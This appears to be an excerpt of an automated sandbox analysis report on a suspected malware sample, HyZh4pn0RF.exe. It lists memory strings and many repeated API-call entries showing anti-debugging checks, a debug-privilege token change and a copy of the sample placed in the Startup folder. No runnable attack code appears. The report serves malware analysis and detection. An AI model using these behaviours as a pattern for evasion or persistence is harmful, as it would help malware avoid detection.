Source: HyZh4pn0RF.exe, 00000000.00000003.1471241194.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
Source: HyZh4pn0RF.exe, 00000002.00000003.1793434238.000002539A5FB000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1807685273.000002539A627000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1494518029.000002539A604000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1493090352.000002539A610000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1807845266.000002539A62D000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1793898154.000002539A626000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000002.1821768941.000002539A631000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWtrin%SystemRoot%\system32\mswsock.dlld format IP to string (123.45.67.89)
Source: HyZh4pn0RF.exe, 00000002.00000003.1494518029.000002539A661000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1491643506.000002539A661000.00000004.00000020.00020000.00000000.sdmp, HyZh4pn0RF.exe, 00000002.00000003.1493090352.000002539A661000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe

Code function: 0_2_00007FF78F48C57C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF78F48C57C

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe

Code function: 0_2_00007FF78F4A3AF0 GetProcessHeap,

0_2_00007FF78F4A3AF0

Source: C:\Windows\System32\tasklist.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F48C760 SetUnhandledExceptionFilter,	0_2_00007FF78F48C760
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F48C57C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF78F48C57C
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F48BCE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF78F48BCE0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 0_2_00007FF78F49ABD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF78F49ABD8
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA462AA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FFBAA462AA0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA463068 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FFBAA463068
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAA6AABE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FFBAA6AABE0
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB3E1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FFBAB3E1960
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB3E1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FFBAB3E1390
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB5F1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FFBAB5F1390
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB5F1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FFBAB5F1960
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB601390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FFBAB601390
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB601960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FFBAB601960
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB611390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FFBAB611390
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB611960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FFBAB611960
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB621390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FFBAB621390
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB621960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FFBAB621960
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB631390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FFBAB631390
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB631960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FFBAB631960
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB641390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FFBAB641390
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB641960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FFBAB641960
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB651390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FFBAB651390
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB651960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FFBAB651960
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB661390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FFBAB661390
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB661960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FFBAB661960
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB671390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FFBAB671390
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB671960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FFBAB671960
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB681390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FFBAB681390
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB681960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FFBAB681960
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB691390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FFBAB691390
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB691960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FFBAB691960
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB6B42E8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FFBAB6B42E8
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB6B3D20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FFBAB6B3D20
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB6DFFF8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FFBAB6DFFF8
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB6DFA30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FFBAB6DFA30
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: 2_2_00007FFBAB7C7030 RtlLookupFunctionEntry,SetUnhandledExceptionFilter,	2_2_00007FFBAB7C7030
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF76932BCE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_00007FF76932BCE0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF76933ABD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00007FF76933ABD8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF76932C57C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00007FF76932C57C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 9_2_00007FF76932C760 SetUnhandledExceptionFilter,	9_2_00007FF76932C760
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBA8CA3068 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FFBA8CA3068
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBA8CA2AA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FFBA8CA2AA0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA291390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FFBAA291390
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA291960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FFBAA291960
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2A1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FFBAA2A1390
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2A1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FFBAA2A1960
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA3DABE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FFBAA3DABE0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB321960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FFBAB321960
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB321390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FFBAB321390
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB331960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FFBAB331960
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB331390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FFBAB331390
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB341960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FFBAB341960
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB341390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FFBAB341390
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB351960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FFBAB351960
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB351390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FFBAB351390
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB361960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FFBAB361960
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB361390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FFBAB361390
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB371960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FFBAB371960
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB371390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FFBAB371390
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB381960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FFBAB381960
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB381390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FFBAB381390
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB391960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FFBAB391960
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB391390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FFBAB391390
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB3A1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FFBAB3A1960
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB3A1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FFBAB3A1390
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB3B1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FFBAB3B1960
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB3B1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FFBAB3B1390
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB3C1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FFBAB3C1960
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB3C1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FFBAB3C1390
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB3D1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FFBAB3D1960
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB3D1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FFBAB3D1390
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB6F1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FFBBB6F1390
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB6F1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FFBBB6F1960
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB701390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FFBBB701390
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB701960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FFBBB701960
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB711960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FFBBB711960
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB711390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FFBBB711390
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB733D20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FFBBB733D20
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB7342E8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FFBBB7342E8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB751430 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FFBBB751430
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB751A00 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FFBBB751A00
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB761A30 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FFBBB761A30
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB761460 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FFBBB761460
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB774660 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FFBBB774660
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB774090 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FFBBB774090
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB79BEA0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FFBBB79BEA0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB79B8D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FFBBB79B8D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB7BFFF8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FFBBB7BFFF8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB7BFA30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FFBBB7BFA30
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB7F1FA0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00007FFBBB7F1FA0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB7F19D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FFBBB7F19D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB801C20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FFBBB801C20
